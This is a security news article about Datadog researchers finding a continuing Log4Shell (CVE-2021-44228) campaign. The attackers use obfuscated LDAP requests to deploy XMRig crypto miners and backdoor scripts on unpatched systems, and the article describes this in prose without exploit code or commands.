More than two years after the critical Log4j zero-day sparked chaos around the world, organizations are still being hit by exploits pushing crypto-currency miners and malicious backdoor scripts.
According to researchers at Datadog Security Labs, opportunistic cybercriminals are still finding targets for ‘Log4Shell’ exploits that evade detection and plant malware scripts on unpatched corporate systems.
The Datadog discovery highlights the long tail of risk from critical vulnerabilities that remain unpatched years after fixes are available, even for remote code execution issues known to be actively exploited.
The Log4j flaw, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team in November 2021. Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Nation-state APT actors linked to China, Iran, North Korea and Turkey have added exploits for the code-execution flaw into hacking toolkits and malware hunters have also spotted ransomware and botnet gangs launching Log4j malware exploits.
Security experts have warned that eradicating the problem will be a long, laborious process because of software dependencies and so-called “transitive dependencies” that make patching very difficult.
In the latest campaign, Datadog researchers discovered the attackers using obfuscated LDAP requests to evade detection, leading to the execution of malicious scripts on compromised systems.
“On July 30, 2024, one of our Confluence honeypots built with HASH received what appeared to be a traditional Log4Shell exploitation probe at a known Tor exit node. Upon further analysis, we discovered a new opportunistic campaign leading to XMRig deployment for crypto mining,” the company said.
The attackers are also planting scripts to establish persistence, exfiltrate data, and maintain control through multiple backdoors and encrypted communication channels.
Related: Exploits Swirling for Major Security Defect in Apache Log4j
Related: US Gov Warning: Start Hunting for Iranian APTs That Exploited Log4j
Related: Attackers Hitting VMWare Horizon Servers With Log4j Exploits
Related: Google Finds 35,863 Java Packages Using Defective Log4j